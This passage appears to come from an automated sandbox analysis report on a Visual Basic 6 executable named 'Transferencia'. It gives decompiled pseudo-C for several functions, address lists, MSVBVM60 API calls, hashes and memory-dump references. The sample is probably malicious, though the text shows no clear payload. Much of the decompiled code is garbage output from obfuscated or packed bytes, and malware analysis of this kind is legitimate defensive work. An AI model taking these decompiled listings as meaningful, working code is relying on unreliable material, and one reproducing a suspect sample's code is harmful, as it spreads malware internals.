					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t40 =  *_t40 + _t40;
					 *_t64 =  *_t64 + _t64;
					_t75 = _t40;
					_t66 = _t64 - 0x00000001 ^  *[gs:edx+0x60];
					_t43 = _t40 & 0x30;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *_t43 =  *_t43 + _t43;
					 *((intOrPtr*)(_t66 + 0x4d)) =  *((intOrPtr*)(_t66 + 0x4d)) - _t43;
					 *0x217e6456 =  *0x217e6456 | _t75;
					asm("scasb");
					_t45 = _t69;
					asm("a16 jb 0x2d");
					_t46 = _t45 |  *_t45;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *_t46 =  *_t46 + _t46;
					 *0x1fe9564f =  *0x1fe9564f + _t66;
					_t70 = _t69 - 1;
					goto 0xfe683e1b;
					 *0x25 =  *0x25 + 1;
					asm("invalid");
					asm("das");
					asm("aaa");
					asm("xlatb");
					asm("sbb ch, [edx]");
					_t49 = _t46 + 0x00000006 +  *_t57 ^  *_t66;
					 *_t49 =  *_t49 + _t49;
					 *0x6000000 =  *0x6000000 + _t49;
					 *_t49 =  *_t49 + _t49;
					 *_t70 =  *_t70 + _t49;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t49 =  *_t49 + 0x25;
					 *_t49 =  *_t49 + _t49;
					 *_t70 =  *_t70 + _t49;
					 *_t49 =  *_t49 + _t49;
					 *_t75 =  *_t75 + _t49;
					 *_t49 =  *_t49 + _t49;
					 *0x4000000 =  *0x4000000 + _t49;
					 *_t75 =  *_t75 | 0x00000025;
					asm("adc [ebx], eax");
					_t76 = _t57;
					asm("stosb");
					_t50 = _t49 & 0x0705ff26;
					es = ds;
					 *_t50 =  *_t50 + 1;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + 1;
					 *_t50 =  *_t50 + _t50;
					asm("invalid");
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *0x25 =  *0x25 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *_t57 =  *_t57 + _t50;
					 *_t50 =  *_t50 + _t50;
					 *0x8050503 =  *0x8050503 + _t50;
					_t63 = 0x00000025 ^  *(_t57 + 0x51);
					[far dword [edi](_t63, es, es, _t75, _t45);
					asm("daa");
					 *_t63 =  *_t63 - 1;
					_t51 = _t50 | 0x0000ff0d;
					_t58 = _t57 + _t57;
					_push(ss);
					 *_t51 =  *_t51 + _t51;
					 *0x16000000 =  *0x16000000 + 0x3c;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *_t51 =  *_t51 + _t58;
					 *_t51 =  *_t51 + _t51;
					 *0x16000000 =  *0x16000000 + 0x3c;
					 *_t51 =  *_t51 + _t51;
					 *_t76 =  *_t76 + 0x3c;
					 *_t51 =  *_t51 + _t51;
					 *0x14000000 =  *0x14000000 + 0x3c;
					 *_t51 =  *_t51 + _t51;
					 *_t63 =  *_t63 + 0x3c;
					 *(_t51 + 0x4e) =  *(_t51 + 0x4e) ^ _t63;
					 *(_t92 + _t51 * 2) =  *(_t92 + _t51 * 2) << 1;
					goto ( *__ecx);
				}
				asm("popad");
				if (_t99 < 0) goto L7;
				asm("sbb [ecx], eax");
				 *_t64 =  *_t64 + _t40;
				_t52 = _t40 &  *_t40;
				_t61 = _t61 &  *(_t74 + 0x6c000044);
				if (_t61 == 0) goto L8;
				 *((intOrPtr*)(_t74 + 0x44)) =  *((intOrPtr*)(_t74 + 0x44)) + _t52;
				 *_t61 =  *_t61 + _t52;
				 *((intOrPtr*)(_t52 + _t52)) =  *((intOrPtr*)(_t52 + _t52)) + _t52;
				 *_t52 =  *_t52 ^ _t64;
				 *_t52 =  *_t52 + _t52;
				 *_t52 =  *_t52 + _t52;
				 *_t52 =  *_t52 & _t52;
				 *_t52 =  *_t52 + _t52;
				 *_t52 =  *_t52 + _t52;
				 *_t52 =  *_t52 + _t52;
				 *_t52 =  *_t52 & _t52;
				 *_t61 =  *_t61 + _t52;
				 *_t52 =  *_t52 + _t52;
				 *((intOrPtr*)(_t52 - 0x11fffff0)) =  *((intOrPtr*)(_t52 - 0x11fffff0)) + _t61;
				_t53 = _t52 & 0x18180000;
				 *_t53 =  *_t53 + _t53;
				 *_t53 =  *_t53 + _t53;
				 *_t53 =  *_t53 & _t53;
				 *_t61 = _t61;
				 *_t53 =  *_t53 + _t53;
				_t54 = _t74 + 1;
				 *[ss:eax] =  *[ss:eax] + _t54;
				asm("adc [eax], dl");
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 + _t54;
				 *_t54 =  *_t54 & _t54;
				_push(0x1e000004);
				_t40 = _t54 + 1;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 - _t40;
				 *_t40 =  *_t40 + _t40;
				 *_t40 =  *_t40 ^ _t40;
				 *_t40 =  *_t40 + _t40;
				asm("pushad");
				 *_t40 =  *_t40 + _t40;
				goto L9;
			}

0x00401328
0x0040132d
0x00401332
0x00401334
0x00401336
0x00401338
0x00401338
0x0040133a
0x0040133e
0x00401340
0x00401342
0x00401342
0x00401346
0x00401348
0x0040134a
0x0040134b
0x0040134c
0x00401353
0x00401354
0x00401356
0x00401358
0x0040135a
0x0040135c
0x0040135e
0x0040135f
0x00401364
0x00401364
0x00401365
0x0040136a
0x0040136b
0x0040136d
0x0040136f
0x00401370
0x00401372
0x00401374
0x00401376
0x00401378
0x00401379
0x00401380
0x00401382
0x00401382
0x00401389
0x00401389
0x0040138d
0x0040138e
0x0040138f
0x00401390
0x00401391
0x00401392
0x00401393
0x00401399
0x0040139a
0x0040139c
0x004013a2
0x004013a3
0x004013a9
0x004013ab
0x004013ad
0x004013af
0x004013b1
0x004013b3
0x004013b5
0x004013b7
0x004013b9
0x004013bb
0x004013bd
0x004013bf
0x004013c1
0x004013c3
0x004013c5
0x004013c7
0x004013ce
0x004013cf
0x004013d1
0x004013d3
0x004013d7
0x004013d9
0x004013da
0x004013dc
0x004013dd
0x004013dd
0x004013e3
0x004013e4
0x0040144f
0x0040144f
0x00401451
0x00401453
0x00401455
0x00401457
0x0040145d
0x0040145f
0x00401461
0x00401463
0x00401465
0x00401467
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401471
0x00401473
0x00401475
0x00401477
0x00401479
0x0040147b
0x0040147d
0x0040147f
0x00401481
0x00401483
0x00401485
0x00401487
0x00401489
0x0040148b
0x0040148d
0x0040148f
0x00401491
0x00401493
0x00401495
0x00401497
0x00401499
0x0040149b
0x0040149d
0x0040149f
0x004014a1
0x004014a3
0x004014a5
0x004014a7
0x004014a9
0x004014ab
0x004014ad
0x004014af
0x004014b1
0x004014b3
0x004014b5
0x004014b7
0x004014b9
0x004014bb
0x004014bd
0x004014bf
0x004014c1
0x004014c3
0x004014c5
0x004014c7
0x004014c9
0x004014cb
0x004014cd
0x004014cf
0x004014d1
0x004014d3
0x004014d5
0x004014d7
0x004014d9
0x004014db
0x004014dd
0x004014df
0x004014e1
0x004014e3
0x004014e5
0x004014e7
0x004014e9
0x004014eb
0x004014ed
0x004014ef
0x004014f1
0x004014f3
0x004014f5
0x004014f7
0x004014f9
0x004014fb
0x004014fd
0x004014ff
0x00401501
0x00401503
0x00401505
0x00401507
0x00401509
0x0040150b
0x0040150d
0x0040150f
0x00401511
0x00401513
0x00401515
0x00401517
0x00401519
0x0040151b
0x0040151d
0x0040151f
0x00401521
0x00401523
0x00401525
0x00401527
0x00401529
0x0040152b
0x0040152d
0x0040152f
0x00401531
0x00401533
0x00401535
0x00401537
0x00401539
0x0040153b
0x0040153d
0x0040153f
0x00401541
0x00401543
0x00401545
0x00401547
0x00401549
0x0040154b
0x0040154d
0x0040154f
0x00401551
0x00401553
0x00401555
0x00401557
0x00401559
0x0040155b
0x0040155d
0x0040155f
0x00401561
0x00401563
0x00401565
0x00401567
0x00401569
0x0040156b
0x0040156d
0x0040156f
0x00401571
0x00401573
0x00401575
0x00401577
0x00401579
0x0040157b
0x0040157d
0x0040157f
0x00401581
0x00401583
0x00401585
0x00401587
0x00401589
0x0040158b
0x0040158d
0x0040158f
0x00401591
0x00401593
0x00401595
0x00401597
0x00401599
0x0040159b
0x0040159d
0x0040159f
0x004015a1
0x004015a3
0x004015a5
0x004015a7
0x004015a9
0x004015ab
0x004015ad
0x004015af
0x004015b1
0x004015b3
0x004015b5
0x004015b7
0x004015b9
0x004015bb
0x004015bd
0x004015bf
0x004015c1
0x004015c3
0x004015c5
0x004015c7
0x004015c9
0x004015cb
0x004015cd
0x004015cf
0x004015d1
0x004015d3
0x004015d5
0x004015d7
0x004015d9
0x004015db
0x004015dd
0x004015df
0x004015e1
0x004015e3
0x004015e5
0x004015e7
0x004015e9
0x004015eb
0x004015ed
0x004015ef
0x004015f1
0x004015f3
0x004015f5
0x004015f7
0x004015f9
0x004015fb
0x004015fd
0x004015ff
0x00401601
0x00401603
0x00401605
0x00401607
0x00401609
0x0040160b
0x0040160d
0x0040160f
0x00401611
0x00401613
0x00401615
0x00401617
0x00401619
0x0040161b
0x0040161d
0x0040161f
0x00401621
0x00401623
0x00401625
0x00401627
0x00401629
0x0040162b
0x0040162d
0x0040162f
0x00401631
0x00401633
0x00401636
0x0040163f
0x00401647
0x0040164c
0x0040164e
0x00401650
0x00401652
0x00401654
0x00401656
0x00401658
0x0040165a
0x0040165c
0x0040165e
0x00401660
0x00401662
0x00401664
0x00401666
0x00401668
0x0040166a
0x0040166c
0x0040166e
0x00401670
0x00401672
0x00401674
0x00401676
0x00401678
0x0040167a
0x0040167c
0x0040167e
0x00401680
0x00401682
0x00401684
0x00401686
0x00401688
0x0040168b
0x00401697
0x00401698
0x0040169a
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b1
0x004016b3
0x004016b5
0x004016b7
0x004016b9
0x004016bb
0x004016bd
0x004016bf
0x004016c1
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d3
0x004016d5
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016ef
0x004016f1
0x004016f3
0x004016f5
0x004016f7
0x004016ff
0x00401703
0x00401705
0x00401706
0x00401707
0x00401708
0x0040170a
0x0040170c
0x0040170e
0x00401714
0x00401716
0x00401718
0x0040171a
0x0040171c
0x0040171e
0x00401720
0x00401722
0x00401724
0x00401726
0x00401728
0x0040172a
0x0040172c
0x0040172e
0x00401730
0x00401732
0x00401734
0x00401736
0x00401738
0x0040173a
0x0040173c
0x0040173e
0x00401744
0x00401746
0x0040174a
0x0040174b
0x0040174d
0x00401752
0x00401753
0x00401755
0x00401757
0x00401759
0x0040175b
0x00401764
0x00401766
0x00401768
0x0040176a
0x0040176c
0x0040176e
0x00401770
0x00401772
0x00401774
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177e
0x00401780
0x00401782
0x00401784
0x00401786
0x00401788
0x0040178a
0x0040178c
0x0040178e
0x00401790
0x00401792
0x00401794
0x00401796
0x00401798
0x0040179a
0x0040179c
0x0040179e
0x004017a0
0x004017a2
0x004017a4
0x004017a6
0x004017a8
0x004017aa
0x004017ac
0x004017ae
0x004017b4
0x004017bb
0x004017be
0x004017bf
0x004017c1
0x004017c6
0x004017c8
0x004017d0
0x004017d2
0x004017d4
0x004017d6
0x004017d8
0x004017da
0x004017dc
0x004017de
0x004017e0
0x004017e2
0x004017e4
0x004017e6
0x004017e8
0x004017ea
0x004017ec
0x004017ee
0x004017f0
0x004017f2
0x004017f4
0x004017f6
0x004017f8
0x004017fa
0x004017fc
0x004017fe
0x00401804
0x00401806
0x00401808
0x0040180b
0x0040180f
0x0040180f
0x004013e7
0x004013e8
0x004013ea
0x004013ec
0x004013ef
0x004013f1
0x004013f7
0x004013f9
0x004013ff
0x00401401
0x00401404
0x00401406
0x00401408
0x0040140a
0x0040140e
0x00401411
0x00401413
0x00401415
0x00401417
0x00401419
0x0040141b
0x00401421
0x00401426
0x00401428
0x0040142a
0x0040142c
0x0040142e
0x00401430
0x00401431
0x00401434
0x00401436
0x00401438
0x0040143a
0x0040143c
0x00401441
0x00401442
0x00401444
0x00401446
0x00401448
0x0040144a
0x0040144c
0x0040144d
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040132D

Strings

VB5!6&*, xrefs: 00401328

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: a379705f11cc3262f5b1dd9dc71cd1c78ad3aa2fc2a0a310faf9fd3ef98b0380
Instruction ID: 863b19195d7ca7125e0c8eb0abf83b6066f3c2dc813de14bd21e215bc050e3e2
Opcode Fuzzy Hash: a379705f11cc3262f5b1dd9dc71cd1c78ad3aa2fc2a0a310faf9fd3ef98b0380
Instruction Fuzzy Hash: 2101CC61A5E7C1AFD7079B354CA5982BFB4AE0325530A06DBD482DF4B3D22D0C1AC76A

Uniqueness

Uniqueness Score: -1.00%

Function 00414528, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c86724e1b4d65043b60bea7e113f50d5b496f554b42f1d4fde11737a366b2f2
Instruction ID: 62285ec04df69faa409a0099abe131dc54f1baede82f8d7fc38cdb1ddeef0124
Opcode Fuzzy Hash: 2c86724e1b4d65043b60bea7e113f50d5b496f554b42f1d4fde11737a366b2f2
Instruction Fuzzy Hash: E6B01230386001BF970042D46C014A21181D380BC03208C77F501D33D1DB28CC40412D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004145B8, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d8f1f195151a3571b7b7305865becfa1317242ab0f18a7e7545d9aed6398b2
Instruction ID: 15df0377eb914a4a6d654d1db9e9196803201494f8317a0833ad6970402ee143
Opcode Fuzzy Hash: 08d8f1f195151a3571b7b7305865becfa1317242ab0f18a7e7545d9aed6398b2
Instruction Fuzzy Hash: FAB012303A5103BF974046985C41CA111C1D3C07803304C77F600D11D1DA68CD40C12D

Uniqueness

Uniqueness Score: -1.00%

Function 004172B8, Relevance: 10.6, APIs: 7, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E004172B8(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				short _v48;
				void* _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v92;
				signed int _t51;
				signed int _t56;
				short _t57;
				void* _t65;
				void* _t67;
				intOrPtr _t68;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				L004011F0();
				_v16 = _t68;
				_v12 = 0x4011b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x4011f6, _t65);
				L00401292();
				if( *0x41831c != 0) {
					_v84 = 0x41831c;
				} else {
					_push(0x41831c);
					_push(0x414720);
					L004012FE();
					_v84 = 0x41831c;
				}
				_v60 =  *_v84;
				_t51 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v52);
				asm("fclex");
				_v64 = _t51;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x414710);
					_push(_v60);
					_push(_v64);
					L00401304();
					_v88 = _t51;
				}
				_v68 = _v52;
				_t56 =  *((intOrPtr*)( *_v68 + 0xc8))(_v68,  &_v56);
				asm("fclex");
				_v72 = _t56;
				if(_v72 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0xc8);
					_push(0x414730);
					_push(_v68);
					_push(_v72);
					L00401304();
					_v92 = _t56;
				}
				_t57 = _v56;
				_v48 = _t57;
				L004012E6();
				_push(0x4173d2);
				L004012C2();
				return _t57;
			}

0x004172bb
0x004172ca
0x004172d4
0x004172dc
0x004172df
0x004172e6
0x004172f5
0x004172fe
0x0041730a
0x00417324
0x0041730c
0x0041730c
0x00417311
0x00417316
0x0041731b
0x0041731b
0x00417330
0x0041733f
0x00417342
0x00417344
0x0041734b
0x00417364
0x0041734d
0x0041734d
0x0041734f
0x00417354
0x00417357
0x0041735a
0x0041735f
0x0041735f
0x0041736b
0x0041737a
0x00417380
0x00417382
0x00417389
0x004173a5
0x0041738b
0x0041738b
0x00417390
0x00417395
0x00417398
0x0041739b
0x004173a0
0x004173a0
0x004173a9
0x004173ad
0x004173b4
0x004173b9
0x004173cc
0x004173d1

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 004172D4
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 004172FE
__vbaNew2.MSVBVM60(00414720,0041831C,?,?,?,?,004011F6), ref: 00417316
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414710,00000014), ref: 0041735A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414730,000000C8), ref: 0041739B
__vbaFreeObj.MSVBVM60 ref: 004173B4
__vbaFreeVar.MSVBVM60(004173D2), ref: 004173CC

Memory Dump Source

Source File: 00000000.00000002.902848355.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.902835212.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902866218.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.902871256.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2
String ID:
API String ID: 304406766-0
